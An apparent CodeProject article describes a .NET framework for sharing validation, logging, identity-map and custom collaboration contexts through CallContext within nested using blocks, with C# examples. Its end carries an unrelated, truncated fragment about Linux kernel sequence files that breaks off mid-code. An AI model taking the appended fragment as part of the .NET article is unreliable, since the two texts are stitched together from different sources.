Simple Object Collaboration Framework (SOCF) is a lightweight framework that is based on CallContext and HTTPContext, and extends the concept to control object sharing and lifetime more granularly in a hierarchical fashion. Although it is based on a very simple idea and has a very compact library, it actually could create a new style of programming on the .NET platform. This new style of programming makes it possible to start a collaboration within a using() block, and allows all nested calls to access shared data in a strongly typed fashion. Collaboration contexts of the same type can be nested. When nested, some collaboration contexts just override the parent (like validation and logging), while others (like IdentityMap) can merge their content with the parents or delegate some of their behavior to the parent. A collaboration context object and all the objects cached in it live until the using block is exited. This provides more granular and explicit control over the scope and lifetime.
using()
using
Following is a diagram that shows how the proposed mechanism extends ASP.NET caching as well as the HTTPContext request scope:
The red rectangles represent the new collaboration context objects that can be organized in a hierarchical fashion depending on how they are nested within the code execution path. For ASP.NET applications and Web Services, the collaboration context objects just use the more reliable HTTPContext.
For Windows applications, the same diagram actually becomes simpler:
For Windows applications, CallContext is a reliable way to handle thread specific data.
The attached source code includes a simple library that implements various collaboration context classes (Named, Typed, Custom, IdentityMap), and some sample code that shows how to use them.
This is a class diagram of the collaboration context model implemented by the SOCF:
The attached sample code demonstrates a simple order processing system that relies on contextual object sharing to do collaboration. The simplest way to start collaboration is to just start a using block as follows:
using (var validation = new ValidationContext())
{
try
{
TestOrderConfirmation();
}
finally
{
// Dump the validation context in any case
validation.Dump();
}
}
TestOrderConfirmation performs multiple steps to process the order. Each step could be implemented in a service method, or some other handler object. The magic of collaboration context makes it possible to access the ValidationContext inside any nested call throughout the execution code path. Here's how you would access the validation context at any point in the code:
TestOrderConfirmation
ValidationContext
if (ValidationContext.Current != null)
{
if (order.Order_Details.Count == 0)
ValidationContext.AddError(order, "No order details!");
}
You could even call other methods that do their own validation, which should be treated entirely on their own. The collaboration context mechanism provided by SOCF ensures that there is only one current context object for a given type at any time. The last instantiated object just replaces any older instances. But, it also points back to the old instance. We'll call this old instance the super context or the parent context. If the context block shown in the example was nested within a different collaboration context of the same type, the following property would return the parent context (or super context):
ValidationContext.Current.SuperContext
Notice that the validation code within the order processing service is executed only when a ValidationContext is available. So, if you remove the using block, the system won't even do any validation. This is a good example of controlling orthogonal system behavior without having to change class contracts.
Another very common example of this kind of a context object is a logger. ASP.NET Trace behaves in a very similar fashion with the current request. However, it is only available within ASP.NET code. If you have a multi-layered architecture, you need to invent a similar mechanism. The example code actually provides one such logging context object which uses the proposed style of programming. So, you can just start a collaboration context for logging at any point in your code, like this:
using (var log = new LoggingContext())
{
try
{
TestOrderConfirmationWithAdditionalValidationContext();
// The call context will now have both logging
// and validation context, as well as the OrderConfirmation
// collaboration inside the order service.
}
finally
{
// All the logging is done so far,
// we can now check what has been written to log.
log.Dump();
}
}
And, inside any of the called methods, you can now access the logging context using:
LoggingContext.Add("Processing order");
The implementation of the LoggingContext makes sure that there is a logging context before actually processing it. So, it is up to the client to decide whether the logging should be done or not. The rest of the system doesn't have to change. And notice, this is all done without changing any class contracts, and without affecting or being affected by other running threads. All related messages will be accumulated into one log object, and later dumped out to the debug window, or could be used to log into the standard Trace output. If you were to use the Trace output, all the parallel running code in other threads would put their messages at arbitrary times into the log, and you would see the result as an interwoven sequence rather than a contiguous one. The LogginContext, on the other hand, makes sure all the messages are related to the operations of the currently executing code path and only enclosed by the logging context.
LoggingContext
LogginContext
Following is a sequence diagram that illustrates the order and life time of collaboration context objects as well as their accessibility from each method.
Blue lifelines represent method scope. The red lifelines represent collaboration contexts started by methods. Dashed arrows pointing backwards represent what a method can access (not method return). So, the method that is at the deepest level of nesting can access all collaboration contexts enclosing its call.
SOCF allows you to create your own custom collaboration entities. Here's a sample ConfirmationCollaboration object that is taken from the sample code:
ConfirmationCollaboration
public class OrderConfirmation : CustomCollaboration
{
public Customer Customer { get; set; }
public Order Order { get; set; }
public IEmailService EmailService { get; set; }
public static OrderConfirmation Current
{
get { return Get<OrderConfirmation>(); }
}
}
Here’s how the class diagram for this collaboration entity looks like:
Contrary to Logging and Validation context, the OrderConfirmation represents a domain specific collaboration. So, it is not orthogonal to the tasks performed. Usually, object models contain only entities and services, but don't have higher level abstractions that are built on top of them. I think this is mostly caused by a sense of economy against class explosion. You already have a lot of entities, services, and perhaps, many other generated classes to fill your project. Don’t you? Why add more classes? But, if you think about it, the above class is actually just a contract that could be shared. So, instead of passing the same set of objects from one method to another, you could just create a class, put all the necessary objects there, and pass a single object around. That would make the code briefer, much more readable, and controllable. Of course, if you take it to an extreme, it could also be dangerous. You could just start using the same contract for every method. So, there is a tradeoff between brevity and precision. Either you'll design all your methods precisely to accept parameters that they require, or have a single object to use as a contract for a well known set of operations that usually go together. If you have a complex object model, you may prefer the latter. Effectively, what we are doing is just defining the set of objects that will contribute to a particular domain specific collaboration.
OrderConfirmation
Furthermore, with the usage of a simple collaboration framework, we are now able to provide a collaboration context accessible to all the methods in the execution path. So, we don't even have to pass it as a parameter. This is pretty much similar to the ASP.NET Request or Response objects. We already know that we'll be using Request and Response during the processing of a request, so there's no point of passing the same objects to every single method in the code. These are just made available by the runtime, and your code can access them at any time, in any method. Similarly, we can do the same with OrderConfirmation, except we can also control when it starts and when it ends:
Request
Response
using (var orderConfirmation = new OrderConfirmation())
{
...
orderConfirmation.Order = order;
orderConfirmation.Customer = customer;
orderConfirmation.EmailService = new EmailService();
// We could also provide the email service through another
// collaboration context object. Here, we opted to make
// it part of the OrderConfirmation collaboration.
...
InitialValidate();
Calculate(); // Calculate data based on order details.
CompleteOrder(); // Complete rest of the order data.
Validate();
InsertOrder(); // Commit
SendConfirmation(); // Send a confirmation email
}
Inside the ConfirmOrder service method, the first thing we do is to start a collaboration context. We then prepare the contents of the collaboration context object by setting its properties. This could also be done using the object initializer syntax of C# 3.0. After this point, we just do calls to methods to do processing without passing any parameters. Those methods could also be implemented by separate handler classes. The methods that perform the processing steps can easily access the order confirmation and use all the objects that contribute to the collaboration. They could even talk to each other and handle events. Imagine a transaction object that is in the collaboration context that can trigger events when it is committed or rolled back. Any object that is part of this collaboration could handle those events and perform extra steps based on the transaction result. In an ordinary transaction handling code, objects that are used in the transaction have no idea what happens to the transaction after they are persisted. Problem is, they could have changed their state during persistence, but the transaction could have rolled back after those changes. Existing transaction mechanisms don't allow code to compensate for such cases. The proposed programming style can be used to give objects the ability to contribute to the handling of transactions. Following is just a pseudo code that shows how it would look like:
ConfirmOrder
SaveOrder
{
TransactionContext.Current.OnRollback +=
new EventHandler(transactionRolledBack);
...
void transactionRolledBack(object sender, EventArgs args)
{
// roll back in memory state of this object if necessary.
}
}
The SOCF library also provides a simple implementation of a generic identity map. An identity map allows you to cache objects by a key and retrieve them. An identity map pattern is usually employed for objects that are costly to initialize (like entities loaded from a database, or received from a service) and are also large in number. Generally, identity map implementations don’t care about the mentioned contextual handling of the map. The simple generic identity map provided by the SOCF is actually a custom collaboration entity that also does contextual handling.
You can start an identity map context for a type at any point in your code, and all the code that is enclosed will just be able to access objects in this local scope.
// Create a simple scope for caching product objects.
// Everyting within the using() block will be able to access this map.
using (var map = new IdentityMap<Product>(IdentityMapScope.Local))
{
...
You can now use the identity map within this block and all its nested calls. To set an object by key into the identity map, use:
IdentityMap<EntityType>.Set(key, entity);
Here’s an example:
IdentityMap<Product>.Set(productID, new Product()
{ ProductID = productID, ProductName = "Product " +
productID.ToString(), UnitPrice = productID * 10 });
To get an object from the identity map:
IdentityMap<EntityType>.Get(key);
Product product = IdentityMap<Product>.Get(productID);
You can even nest such identity map blocks:
// Topmost scope
using (var map1 = new IdentityMap<Product>(IdentityMapScope.Local))
{
...
// Second level nested scope
using (var map2 = new IdentityMap<Product>(IdentityMapScope.AllParents))
{
...
The nested block could be in the same method like the one shown above, or in a nested method call. Each identity map manages its own objects, and has a lifetime controlled by its using block. When you set an object into the identity map, it’ll use the last started context to cache the object. But, when you get an object, you can decide how the identity map should search for it. This is determined by the scope parameter that you pass to the constructor called when you start the identity map. Scope = Local means that the identity map should only search for its own cached objects. Scope = Parent means that the identity map should search for its own cached objects first, but if it can’t find the object, it should continue searching its immediate parent identity map. In other words, it’ll search the identity map that encloses the current one. This is similar to class inheritance, except here, the inheritance behavior is determined by the execution path. So, the parent could be different in one method call than the other depending on how the program flows. Scope = AllParents means that the identity map should search for its own cached objects first, but if it can’t find the object, it should continue searching up the chain of parents one by one until there is no more parent, or the parent is allowed to use a local scope.
Notice that the search behavior can be determined by both the starter of the identity map and its nested identity maps. So, if you want to prevent the usage of a possibly existing parent identity map context, you can just start a new one and pass Scope = Local. Any access to this scope from this method or from nested identity maps will be restricted by the current scope.
Also note that each type has an entirely separate identity map management. So, when you nest identity maps, you don't need to consider the possible effects of identity maps of other types, because they have no effect at all.
The sample code contains a separate test class that shows examples of using the identity mapping collaboration context entity with and without nesting.
SOCF uses a provider model to abstract the access to the underlying call context technology. The default implementation just uses the Remoting CallContext class. If you want to use this library in an ASP.NET application or a Web Service project, you must make sure that the correct context provider is set. You can do this by setting a static property in the Global.asax Application_Start event:
Application_Start
protected void Application_Start(object sender, EventArgs e)
{
// Make sure ASP.NET specific call context
// provider is set when the application starts.
CallContextFactory.Instance =
new CallContextProviderForASPNET.CallContextProviderForASPNET();
}
This concept is very powerful, and can be used very effectively, if used properly. As with any powerful tool, you can get much more benefit than harm by recognizing the potential pitfalls.
If you use the collaboration context excessively, it will only make the system very loose and fragile. Don't forget that contextual information is only available when the caller decides to provide it. So, they are more like optional parameters than parameters. The collaboration context approach is most useful for sharing objects that represent an orthogonal concern. This type of use is more obvious (logging, transactions, etc). But, it can also be used to create a common single point of access to all objects for a given task. This type of usage actually creates an implicit contract. For simple tasks that are also expected to stay simple, you had better just use conventional ways of passing objects around. On the other hand, a collaboration context will be very useful for complex models having multiple layers, or a pipeline style of processing, and will make things simpler, remain simpler, and also enhance extensibility. Such systems can be evolved by just adding code that starts collaborations, and code that consumes those collaborations only at the points of interest without touching the rest of the system.
Always remember that objects are placed into the call context for one purpose, and are available for all the nested calls, where as parameters would only be available for a particular method call. One object put into the context has a specific role, and if indirect calls to other code don’t assume this, it will probably not function correctly. This is just like having a parameter but using it for a different purpose than what it was originally intended.
Any object that you put into context will be kept alive with all of its strong references to other objects. For instance, if you have loaded a LINQ-to-SQL data object with some of its relationships, you should be aware that these related objects will also be alive as long as the object you put to session is alive. Try to keep the lifetime of such context objects as minimal as possible. In the case of IdentityMap, since the whole point is to reduce the cost of a database roundtrip or some other object initialization, you may actually want the objects around as long as possible. But still, you need to keep in mind that, not only the object but the whole object graph will be sitting in the context. In brief, you should either keep small object graphs in the context, or make sure that contexts with large object graphs have a short lifetime.
Please note that the SOCF library code has not been tested under heavy load. The purpose of this article is just to propose a new style of programming. So, if you decide to use it in a commercial project, make sure you test it thoroughly on the platform that you are developing. Also, please don't forget to put your feedback on either the technical or conceptual. | http://www.codeproject.com/Articles/33465/A-Simple-Object-Collaboration-Framework?msg=2937709 | CC-MAIN-2014-35 | refinedweb | 4,261 | 53.21 |
During my CS101
class I had the chance to meet Python. That's not completely true, since I
played with it a bit before, but I had a chance to see Python in action during this course. In short, it was really pleasant meeting and I
hope it will grow to a prolonged and mutual relationship. I will
share some 'likes' and 'dislikes' in the following.
What I liked in Python...
Python is very well known language with great reputation and
community around it. Big companies, including Google, using python to
build enterprise level applications. Hackers love Python cause it
combines both simplicity and power. You can do any kind of application
development including desktop and web applications. All the time is
being compared to Ruby, which is for me ends up to something like this only.
No IDE development
You don't need any kind of fancy IDE to start up with Python. Sure, IDE
is something that makes development more efficient, so if you going to
do a lot of programming with Python including debugging you should
probably pick one. But for now, I'm totally happy with Sublime Text 2 as
IDE.
Easy to learn
If you know some OO
language like C++ or Java, it will be quick jump to Python. Python is
object-oriented language but with support of different paradigms as
procedural and even functional programming. The basic concepts of
variables, conditions and control flow are the same as you get used to.
Of course, you spend sometime to know the fundaments - like, how to
compare things, how to calculate length of string or list, how to put
element into dictionary. Sometimes, I still refer to documentation, but
in general all that things are easy to remember with practice.
Interpretation and dynamic typing
Python is interpretator. You never mention the type of
object as you declare it or use it. You might apply different operations
on object, it would be evaluated on runtime. There are different
opinions (holy wars) on Static vs. Dynamic, but as for me with Dynamic
languages the overall development velocity is higher. First of all, you
don't spend any time for compilation, which in case of big solutions
could be really high. Second, as you are only to able to check results
as code executed (even if you just misspell variable name you will know
about it only if this code section is evaluated), you are more focused
on unit tests and TDD to catch up obvious issues, which in general makes
development faster.
Built in types
Python has complete built-in types system. For numbers you can use different types, as int, float, long, complex. The type is evaluated on runtime,
i = 0 # integer j = 1.0 # float x = complex(1, -1) # complex
Strings are everything inside the '' quotes,
str = "I'm string"
Btw, during the course I got conclusion that list is the most flexible data structure. Everything you need, you can build upon lists. Lists are nicely handled with Python,
l = [ 1, 2, 'three', [4, 5], [[6, 7], 8]
Lists are non-optimal for searches, so if you do a lot of searches you might consider using dictionary,
d = { 'one': 1, 'two': 2, 'three': [3] }
Each type has it's own set of methods. Strings including
common operations as concatenation, trimming, substring found etc. For
list and dictionaries there are bunch of useful stuff as getting
iterators, pushing and poping of elements.
Syntax and Code styles
Syntax and Code styles are commonly another topic of holy war.
Fortunately, Python leaves very few room for that. First of all - no
semicolons. Second, Python uses indentation as part of language syntax.
So, poorly indented code would simply won't work.
Basically, everything that is after ":" have to be indented. This is for if, while, for etc. Using tab instead of curvy braces (or any other symbol or term) is really nice idea, allowing to keep code in the same format and 'forcing' one and solid code guidelines along the projects and teams.
What I disliked in Python...
There are no perfect things, moreover perfect languages. Developers have their own habits and opinions on different things. In Python I see several things that makes me little uncomfortable about.
Naming consistency
It sounds like Python adopts C code styles for naming of methods and variables, like longes_cycle or def make_it_work(). But in reality a lot of methods are violating those rules. For instance some methods of dictionary type: fromkeys(), iteritems(), setdefault(). In the same time dict contains the method: has_key().
That's very annoying. Especially if you don't have any IDE with names suggesting, it makes it really hard to remember.
Booleans and None
Almost the same as in topic above. Having the C-style (with a lower first symbol) language designers decided to have a special cases.
a = True # why not true ? b = False # why not false ? x = None # none ?
So, in code which is in general lower case, those True/False/None looking really strange.
def proc3(input_list): if len(input_list) == 0: return None for i in range(0, len(input_list)): for j in range(0, len(input_list)): if input_list[i] == input_list[j] and i != j: return False return True
OO but not OO
Being OO language, Python still relies on some procedural concepts. The good example is calculation of string length. I would expect, that string corresponding method len() or something, but instead we are having 'global' function that does that.
s = "I'm string" print len(s) # why not s.len() ?
len() is overloaded for other types, it would work for list and dictionaries as well,
l = [1, 2, 3] d = { 1: 1, 2: 2, 3: 3 } print len(l) print len(d)
In the same manner, if you what to get reverse iterator for collection, I would assume there corresponding method that returns that iterator. Bad guess,
l = [1, 2, 3] for e in reverse(l): # why l.reverse() print e
__init__() method
Trying out classes in Python first you need to understand is how to construct an object. Python has constructor, that look like that,
class MyClass: def __init__(self, a, b): self.a = a self.b = b
I could understand it would be init or _init or constructor, but I will probably never understand __init__ with 2 underscores before and after. It's ugly.
Conclusion
I'm about to enroll to next Udactity courses, so my Python journey continues. I hope to get more in language and standard library.
{{ parent.title || parent.header.title}}
{{ parent.tldr }}
{{ parent.linkDescription }}{{ parent.urlSource.name }} | https://dzone.com/articles/theres-first-time-everything | CC-MAIN-2016-44 | refinedweb | 1,099 | 64.61 |
ASP.NET MVC 4 Mobile App Development — Save 50%
Create next-generation applications for smart phones, tablets, and mobile devices using the ASP.NET MVC development framework with this book and ebook.
(For more resources related to this topic, see here.)
As the lines between web apps and traditional desktop apps blur, our users have come to expect real-time behavior in our web apps—something that is traditionally the domain of the desktop. One cannot really blame them. Real-time interaction with data, services, and even other users has driven the connected revolution, and we are now connected in more ways than ever before. However valid this desire to be always connected and immediately informed of an event, there are inherent challenges in real-time interactions within web apps.
The first challenge is that the Web is stateless. The Web is built on HTTP, a protocol that is request/response; for each request a browser makes, there is one and only one response. There are frameworks and techniques we can use to mask the statelessness of the Web, but there is no true state built into the Web or HTTP.
This is further complicated as the Web is client/server. As it's stateless, a server only knows of the clients connected at any one given moment, and clients can only display data to the user based upon the last interaction with the server. The only time the client and server have any knowledge of the other is during an active request/response, and this action may change the state of the client or the server. Any change to the server's state is not reflected to the other clients until they connect to the server with a new request. It's somewhat like the uncertainty principle in that the more one tries to pin down one data point of the relationship, the more uncertain one becomes about the other points.
All hope is not lost. There are several techniques that can be used to enable real-time (or near real-time) data exchange between the web server and any active client.
Simulating a connected state
In traditional web development, there has not been a way to maintain a persistent connection between a client browser and the web server. Web developers have gone to great lengths to try and simulate a connected world in the request/response world of HTTP.
Several developers have met with success using creative thinking and loopholes within the standard itself to develop techniques such as long polling and the forever frame. Now, thanks to the realization that such a technique is needed, the organizations overseeing the next generation of web standards are also heeding the call with server-sent events and web sockets.
Long polling
Long polling is the default fallback for any client and server content exchange. It is not reliant on anything but HTTP—no special standards checklists or other chicanery are required.
Long polling is like getting the silent treatment from your partner. You ask a question and you wait indefinitely for an answer. After some known period of time and what may seem like an eternity, you finally receive an answer or the request eventually times out. The process repeats again and again until the request is fully satisfied or the relationship terminates. So, yeah, it's exactly like the silent treatment.
Forever Frame
The Forever Frame technique relies on the HTTP 1.1 standard and a hidden iframe. When the page loads, it contains (or constructs) a hidden iframe used to make a request back to the server. The actual exchange between the client and the server leverages a feature of HTTP 1.1 known as Chunked Encoding. Chunked Encoding is identified by a value of chunked in the HTTP Transfer-Encoding header.
This method of data transfer is intended to allow the server to begin sending portions of data to the client before the entire length of the content is known. When simulating a real-time connection between a browser and web server, the server can dispatch messages to the client as individual chunks on the request made by the iframe.
Server-Sent Events
Server-Sent Events (SSE) provide a mechanism for a server to raise DOM events within a client web browser. This means to use SSE, the browser must support it. As of this writing, support for SSE is minimal but it has been submitted to W3C for inclusion into the HTML5 specification.
The use of SSE begins by declaring an EventSource variable:
var source = new EventSource('/my-data-source');
If you then want to listen to any and all messages sent by the source, you simply treat it as a DOM event and handle it in JavaScript.
source.onmessage = function(event) {
// Process the event.
}
SSE supports the raising of specific events and complex event messaging. The message format is a simple text-based format derivative of JSON. Two newline characters separate each message within the stream, and each message may have an id, data, and event property. SSE also supports setting the retry time using the retry keyword within a message.
:comment
:simple message
data:"this string is my message"
:complex message targeting an event
event:thatjusthappened
data:{ "who":"Professor Plum", "where":"Library", "with":"candlestick"
}
As of this writing, SSE is not supported in Internet Explorer and is partially implemented in a few mobile browsers.
WebSockets
The coup de grâce of real-time communication on the Web is WebSockets. WebSockets support a bidirectional stream between a web browser and web server and only leverage HTTP 1.1 to request a connection upgrade.
Once a connection upgrade has been granted, WebSockets communicate in full-duplex using the WebSocket protocol over a TCP connection, literally creating a client-server connection within the browser that can be used for real-time messaging.
All major desktop browsers and almost all mobile browsers support WebSockets. However, WebSocket usage requires support from the web server, and a WebSocket connection may have trouble working successfully behind a proxy.
With all the tools and techniques available to enable real-time connections between our mobile web app and the web server, how does one make the choice? We could write our code to support long polling, but that would obviously use up resources on the server and require us to do some pretty extensive plumbing on our end. We could try and use WebSockets, but for browsers lacking support or for users behind proxies, we might be introducing more problems than we would solve. If only there was a framework to handle all of this for us, try the best option available and degrade to the almost guaranteed functionality of long polling when required.
Wait. There is. It's called SignalR.
SignalR
provides a framework that abstracts all the previously mentioned real-time connection options into one cohesive communication platform supporting both web development and traditional desktop development.
When establishing a connection between the client and server, SignalR will negotiate the best connection technique/technology possible based upon client and server capability. The actual transport used is hidden beneath a higher-level communication framework that exposes endpoints on the server and allows those endpoints to be invoked by the client. Clients, in turn, may register with the server and have messages pushed to them.
Each client is uniquely identified to the server via a connection ID. This connection ID can be used to send messages explicitly to a client or away from a client. In addition, SignalR supports the concept of groups, each group being a collection of connection IDs. These groups, just like individual connections, can be specifically included or excluded from a communication exchange.
All of these capabilities in SignalR are provided to us by two client/server communication mechanisms: persistent connections and hubs
Persistent connections
Persistent connections are the low-level connections of SignalR. That's not to say they provide access to the actual communication technique being used by SignalR, but to illustrate their primary usage as raw communication between client and server.
Persistent connections behave much as sockets do in traditional network application development. They provide an abstraction above the lower-level communication mechanisms and protocols, but offer little more than that.
When creating an endpoint to handle persistent connection requests over HTTP, the class for handling the connection requests must reside within the Controllers folder (or any other folder containing controllers) and extend the PersistentConnection class.
public class MyPersistentConnection: PersistentConnection
{
}
The PersistentConnection class manages connections from the client to the server by way of events. To handle these connection events, any class that is derived from PersistentConnection may override the methods defined within the PersistentConnection class.
Client interactions with the server raise the following events:
- OnConnected: This is invoked by the framework when a new connection to the server is made.
- OnReconnected: This is invoked when a client connection that has been terminated has reestablished a connection to the server.
- OnRejoiningGroups: This is invoked when a client connection that has timed out is being reestablished so that the connection may be rejoined to the appropriate groups.
- OnReceived: This method is invoked when data is received from the client
- OnDisconnected: This is invoked when the connection between the client and server has been terminated.
Interaction with the client occurs through the Connection property of the PersistentConnection class. When an event is raised, the implementing class can determine if it wishes to broadcast a message using Connection.Broadcast, respond to a specific client using Connection.Send, or add the client that triggered the message to a group using Connection.Groups.
Hubs
Hubs provide us an abstraction over the PersistentConnection class by masking some of the overhead involved in managing raw connections between client and server.
Similar to a persistent connection, a hub is contained within the Controllers folder of your project but instead, extends the Hub base class.
public class MyHub : Hub
{
}
While a hub supports the ability to be notified of connection, reconnection, and disconnection events, unlike the event-driven persistent connection a hub handles the event dispatching for us. Any publicly available method on the Hub class is treated as an endpoint and is addressable by any client by name.
public class MyHub : Hub
{
public void SendMeAMessage(string message)
{ /* ... */ }
}
A hub can communicate with any of its clients using the Clients property of the Hub base class. This property supports methods, just like the Connection property of PersistentConnection, to communicate with specific clients, all clients, or groups of clients.
Rather than break down all the functionality available to us in the Hub class, we will instead learn from an example.
Real-time recipe updates
Within our BrewHow mobile app, it would be nice to receive notifications of new recipe additions when we are looking at the recipe list. To accomplish this, we will use the Hub mechanism provided by the SignalR framework to accomplish real-time notification of additions to the BrewHow recipe collection.
Installing and configuring SignalR
SignalR, like most modern .NET frameworks, is available as a NuGet package: Microsoft.AspNet.SignalR. We can install the package by entering the following into the Package Manager console:
Install-Package Microsoft.AspNet.SignalR
In addition to several assembly references to our project, the SignalR package also adds a new JavaScript file: jquery.signalR-1.1.2.min.js—your version may vary depending upon when you're actually reading this. This JavaScript file contains all the abstractions needed by the client web browser to communicate with both types of SignalR endpoints: persistent connections and hubs.
The SignalR JavaScript file is only one part of the client puzzle. To enable SignalR support in our app, we need to add references to the SignalR JavaScript library as well as to invoke the handler, /signalr/hubs, used to create a JavaScript proxy for any hubs within our project. These references will be placed in _Layout.cshtml.
@Scripts.Render("~/bundles/jquery")
<script
src = "~/Scripts/jquery.signalR-1.1.2.min.js"
type="text/javascript"></script>
<script
src = "~/signalr/hubs"
type="text/javascript"></script>
@RenderSection("scripts", required: false)
We must also register the /signalr/hubs route with the runtime. We can do this by simply invoking the MapHubs extension method for the route collection where we register the other routes for our app.
routes.IgnoreRoute("{resource}.axd/{*pathInfo}");
routes.MapHubs();
routes.MapRoute(
name: "BeerByStyle",
Note that the hub route is placed before all other MapRoute calls or other methods we may use to register routes. We do this because route selection is made on first match, and we don't want to inadvertently register something before SignalR within our route table.
Creating the recipe hub
We need to provide a hub to which clients can connect to receive notifications about new recipe additions.
Right-click on the Controllers folder of our project and select Add New Item….
In the Add New Item dialog box, search for SignalR and choose the SignalR Hub Class. Name the class RecipeHub.cs and click on Add.
We need to modify the RecipeHub class generated by Visual Studio. As stated earlier, clients are going to receive notifications about new recipes, but no client is ever going to post directly to this hub to communicate with the server. As such, we simply need to create an empty hub.
namespace BrewHow.Controllers
{
public class RecipeHub : Hub
{
}
}
An empty class may appear rather meaningless at first glance, but SignalR cannot create a proxy for clients to interact with the server without a class declaration.
Modifying the recipe list view
The recipe list view needs to be modified to connect to the recipe hub. The first order of business is to supply the recipe list with an ID. The ID will be used to locate and modify the list using jQuery. Assign the recipe list an ID of recipe-list.
<table id ="recipe-list">
We can now add some JavaScript that will connect to the recipe hub and upon the notification of a new recipe, append new recipes at the bottom of our table with a background color of yellow.
$(function () {
$.connection.hub.start();
var recipeHub = $.connection.recipeHub;
recipeHub.client.recipeAdded = function (recipe) {
var tr = $("#recipe-list").find('tbody')
.append(
$('<tr>').css('background-color', '#ff0')
.append($('<td>')
.append($('<a>')
.attr('href', '/Recipe/Details/'
+ recipe.RecipeId
+ "/" + recipe.Slug)
.text(recipe.Name))
)
.append($('<td>')
.append($('<a>')
.attr('href', '/Recipe/'
+recipe.StyleSlug)
.text(recipe.Style))
)
.append($('<td>'
+ recipe
.OriginalGravity
.toFixed(3)
+ '</td>'))
.append($('<td>'
+ recipe
.FinalGravity
.toFixed(3)
+ '</td>'))
@if (Request.IsAuthenticated) {
@: .append($('<td>'
@: + 'Add to Library'
@: + '</td>'))
}
);
}
});
The JavaScript code is contained within a closure, ensuring it is only invoked once and cannot be invoked by any outside source. The very first line of code starts the hub connections on the client:
$.connection.hub.start();
The connection object is an object added to jQuery by the SignalR JavaScript. The hub property of the connection object provides a reference to the hub infrastructure of the SignalR client library. The call to the start method initializes the SignalR client and prepares the proxy code generated by the /signalr/hubs call in our _Layout.cshtml page to receive notifications from the server.
Next, the JavaScript establishes a connection to our recipe hub:
var recipeHub = $.connection.recipeHub;
On examining this code carefully, you will see that the connection to our RecipeHub class is identified in the connection class as recipeHub. The /signalr/hubs call that generates the proxy classes for the hubs within our app adds each hub it finds to the connection object using a camel-cased version of the hub class name: RecipeHub becomes recipeHub, MyHub becomes myHub, and so on.
The next line of code registers a method on the client to be invoked by the server when a new recipe is added.
recipeHub.client.recipeAdded = function (recipe) {
We could call this method anything we wanted—well anything except a name that matches a server-side method within the hub. It is the act of declaring a function on the client and assigning it to the client property of the hub that makes the method available to the server.
The rest of the code simply takes the RecipeDisplayViewModel object it receives and appends it to the table with a yellow highlight.
Publishing event notifications
We have talked about responding to clients from within a Hub or PersistentConnection based class. However, our RecipeHub class is empty and we have no other hub. Not to fret. We can notify other users of our app that this event occurred by placing code into the Create method of the RecipeController class after a recipe is saved to the repository.
var context = Microsoft.AspNet.SignalR.
GlobalHost
.ConnectionManager
.GetHubContext<RecipeHub>();
context
.Clients
.All
.recipeAdded(
_displayViewModelMapper
.EntityToViewModel(recipeEntity)
);
This code begins with retrieving the context of our RecipeHub class. We do this using the GetHubContext
Sir Arthur C Clarke said:
"Any sufficiently advanced technology is indistinguishable from magic."
I will let you be the judge as to whether or not it's magic, but to invoke the recipeAdded method we defined and assigned to the client in JavaScript, we simply invoke it here passing the data we wish to return. The runtime handles the event dispatching for us and informs all clients of the RecipeHub class that we are invoking the recipeAdded method. If there is such a method on the client it will be invoked by the SignalR client code.
There is one more change required to make this work. Our repository currently doesn't set the RecipeId property of a recipeEntity class when it has been created. As we use the recipe's ID to provide links to the details from the list, we need to make sure it's available to all clients to which the broadcast is sent. This change is fairly simple. Just modify the repository to set RecipeId after changes to the Entity Framework context have been made.
recipeEntity.RecipeId = newRecipeModel.RecipeId;
Everything should work now. We just need two clients simultaneously connected to test it.
Upon adding the recipe in Google Chrome, it magically appears within Opera Mobile in the recipe list.
Summary
In this article we took a look at SignalR. The SignalR framework gives us unprecedented control of the communication between the browser and web server enabling real-time communication. This technology can be leveraged in games, real-time status updates, or to mimic push communications within a mobile web app.
Resources for Article :
Further resources on this subject:
- iPhone JavaScript: Installing Frameworks[Article]
- Development of iPhone Applications[Article]
- Mixing ASP.NET Webforms and ASP.NET MVC[Article]
About the Author :
Andy Meadows
Andy Meadows has been in a love affair with technology since his third-grade teacher introduced him to her TRS-80 Model III in 1981. After several months of typing "Go North" on the keyboard, he began his foray into BASIC programming. The TRS-80 Model III begat a Commodore 64 and an introduction to Pascal. By 1988, he was spending his summers earning money by writing software in C for local small businesses.
While attending college at the University of Georgia, Andy developed his passion for web development and, of course, beer. His first web application was a series of CGI scripts that output content for NCSA Mosaic and by 1994, he was designing web interfaces for global information systems.
After college, Andy wandered listlessly through the IT world spending time in several verticals using several different languages, but he always returned home to web development. In 2002, he began his foray into mobile development beginning with native Java development, and quickly moving into the mobile web space where he began marrying his two passions: mobile web development and .NET.
Since then, Andy has worked on several projects involving mobile development, web development, or both. He is extremely excited about the future of the mobile web made possible by the newest generation of mobile devices. He is currently working at a startup in Atlanta, where he lives with his wife and two children.
Post new comment | http://www.packtpub.com/article/coding-for-the-real-time-web | CC-MAIN-2014-15 | refinedweb | 3,336 | 52.7 |
Finally, after two installments of the basics of debugging with sequence files, we're going to finish off by demonstrating the power of sequence files with an example that actually, well, sequences its output. And I'm going to admit up front that a bit of what follows is going to be speculation since much of the documentation on sequence files is either incomplete, inconsistent or, sadly, wrong. But we'll muddle through, you'll get to test everything, and the comments section will be open for folks to make suggestions and provide corrections and further enhancements. Additional coverage on sequence files can be found in Chapter 4 here.
(The archive of all previous "Kernel Newbie Corner" articles can be found here.)
This is ongoing content from the Linux Foundation training program. If you want more content, please consider signing up for one of these classes.
So What Are We About to Do?
Assuming you've come to grips with the previous two columns during which we showed how to use the sequence file implementation of proc files to do some basic module debugging, recall that the fundamental limitation of normal proc files is that they're limited to displaying only up to a single page of output, a page being of kernel size PAGE_SIZE. The simpler forms of sequence files you saw in the early columns, while they were terrifically convenient, still have exactly the same limitation, which is why we're going to cover this last variation, which allows you to beat that limit by defining an "iterator" for the output of your sequence file, and looping with that iterator to print as much output as your heart desires, one "item" at a time.
This is a common solution when you want to print, say, the contents of an entire kernel array of structures, or perhaps the entries in a linked list, where the full output would wildly exceed a single kernel page. If, however, you use a sequence file, you can define each output operation to print only a single data object, then just define your iterator to keep looping and printing, one at a time, until all your objects have been printed, the only size limitation being that the output when each of those items is printed can't exceed a single page in size per item.
There is one thing to keep in mind--all of this iteration and looping is completely invisible to the user, who will still simply invoke a single command to list the proc file and watch all that output come streaming by with no idea that all that iterating is happening underneath.
The seq_file Routines
For each seq_file you want to create that supports actual iteration, you need to define the following four routines (listed in the kernel header file include/linux/seq_file.h:
struct seq_operations {
